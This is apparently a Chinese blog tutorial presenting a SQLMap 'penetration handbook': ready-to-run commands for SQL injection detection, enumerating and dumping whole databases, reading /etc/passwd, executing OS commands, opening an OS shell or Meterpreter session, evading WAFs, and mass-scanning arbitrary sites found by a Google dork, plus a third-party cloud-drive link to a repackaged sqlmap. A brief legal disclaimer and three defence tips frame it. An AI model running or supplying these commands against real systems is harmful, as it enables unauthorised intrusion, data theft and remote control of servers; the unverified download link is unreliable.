SQLMap 终极渗透手册(2025全功能版)

超防局2025-10-25 10:26

目录

[⚠️ 法律声明](#⚠️ 法律声明)

工具下载

[🔍 基础侦查](#🔍 基础侦查)

[📂 数据枚举](#📂 数据枚举)

层级式渗透

批量操作

[🛠️ 高级功能](#🛠️ 高级功能)

[1. 权限提升](#1. 权限提升)

[2. 系统命令执行](#2. 系统命令执行)

[3. 绕过WAF](#3. 绕过WAF)

[🎯 实战场景](#🎯 实战场景)

场景1:Cookie注入

场景2:POST注入

场景3:谷歌黑客批量检测

[📊 结果管理](#📊 结果管理)

[⚡ 效率优化](#⚡ 效率优化)

[⚠️ 防护建议](#⚠️ 防护建议)

⚠️ 法律声明

所有技术仅限授权测试使用!未经授权渗透属于违法行为。

工具下载

我用夸克网盘给你分享了「sqlmap_CN.zip」,点击链接或复制整段内容,打开「夸克APP」即可获取。

/~339038pE3e~:/

链接:https://pan.quark.cn/s/0d3faddb83b2

🔍 基础侦查

|-------------------|---------|-----------------------------------------|
| 命令 | 功能 | 示例 |
| sqlmap -u "url" | 基础检测 | sqlmap -u "http://test.com/news?id=1" |
| --current-user | 当前数据库用户 | sqlmap -u "url" --current-user |
| --current-db | 当前数据库 | sqlmap -u "url" --current-db |
| --dbs | 列出所有数据库 | sqlmap -u "url" --dbs |

📂 数据枚举

层级式渗透

复制代码 
# 1. 获取数据库
sqlmap -u "http://test.com/news?id=1" --dbs

# 2. 获取表
sqlmap -u "http://test.com/news?id=1" --tables -D "数据库名"

# 3. 获取字段
sqlmap -u "http://test.com/news?id=1" --columns -T "表名" -D "数据库名"

# 4. 导出数据
sqlmap -u "http://test.com/news?id=1" --dump -C "字段名" -T "表名" -D "数据库名"

批量操作

复制代码 
# 导出整个数据库
sqlmap -u "http://test.com/news?id=1" --dump-all --exclude-sysdbs

# 导出指定范围数据
sqlmap -u "http://test.com/news?id=1" --dump -T "users" -D "app_db" --start=1 --stop=100

🛠️ 高级功能

1. 权限提升

复制代码 
# 检测是否为DBA
sqlmap -u "url" --is-dba

# 获取系统文件(需要高权限)
sqlmap -u "url" --file-read="/etc/passwd"

2. 系统命令执行

复制代码 
# 执行单条命令
sqlmap -u "url" --os-cmd="whoami"

# 获取交互式Shell
sqlmap -u "url" --os-shell

# 获取Meterpreter会话(需Metasploit)
sqlmap -u "url" --os-pwn --msf-path=/opt/metasploit

3. 绕过WAF

复制代码 
# 使用TAMPER脚本
sqlmap -u "url" --tamper="space2comment"

# 设置延迟
sqlmap -u "url" --delay=3

# 随机UA
sqlmap -u "url" --random-agent

🎯 实战场景

场景1:Cookie注入

复制代码 
sqlmap -u "http://test.com/login" --cookie="PHPSESSID=1234" --level=3

场景2:POST注入

复制代码 
sqlmap -u "http://test.com/login" --data="username=admin&password=123"

场景3:谷歌黑客批量检测

复制代码 
sqlmap -g "inurl:.php?id=" --batch --smart

📊 结果管理

复制代码 
# 保存进度
sqlmap -u "url" --output-dir=/root/sqlmap_results

# 恢复进度
sqlmap --resume -l /root/sqlmap_results/log

效率优化

复制代码 
# 多线程扫描
sqlmap -u "url" --threads=5

# 仅检测不攻击
sqlmap -u "url" --dbs --batch --smart

⚠️ 防护建议

  1. 使用参数化查询
  2. 最小化数据库权限
  3. 部署WAF防护

💡 提示:

  • 使用-v 3查看详细过程
  • 复杂环境下添加--flush-session清除缓存
  • 首次测试建议从--level=1 --risk=1开始

👉 按需组合命令参数,注意操作风险! 🚀

相关推荐
是喵斯特ya12 小时前
python开发web暴力破解工具(进阶篇 包含验证码识别和token的处理)
开发语言·python·web安全
bleach-12 小时前
应急响应之入侵检测排查——Windows篇—,Windows日志介绍分析
windows·安全·web安全·网络安全·系统安全
合才科技13 小时前
【要闻周报】网络安全与数据合规 12-20
安全·web安全
IT枫斗者13 小时前
Java 开发实战:从分层架构到性能优化(Spring Boot + MyBatis-Plus + Redis + JWT)
java·spring boot·sql·mysql·性能优化·架构
是喵斯特ya13 小时前
python开发web暴力破解工具(基础篇)
开发语言·python·web安全
旺仔Sec13 小时前
2025年安徽省职业院校技能大赛(高职组)信息安全管理与评估竞赛任务书
web安全·网络安全
悟能不能悟14 小时前
mybatis sql where a=#{a},如果a为null,会返回什么
数据库·sql·mybatis
l1t14 小时前
豆包解读论文:将具有分支和循环控制流的命令式程序转换为标准SQL1999的公共表表达式
开发语言·数据库·人工智能·python·sql·postgresql·duckdb
rannn_11114 小时前
【SQL题解】力扣高频 SQL 50题|DAY1
后端·sql·题解
小韩博14 小时前
小迪第40天:安全开发-JavaEE应用&SpringBoot框架&JWT身份鉴权&打包部署JAR&WAR
spring boot·安全·web安全·java-ee
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04BongoCat - 跨平台键盘猫动画工具05jdk21下载、安装(Windows、Linux、macOS)06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08Open-AutoGLM Windows 安装部署教程09sqli-labs靶场通关笔记:第18-19关 HTTP头部注入10CentOS的ISO镜像下载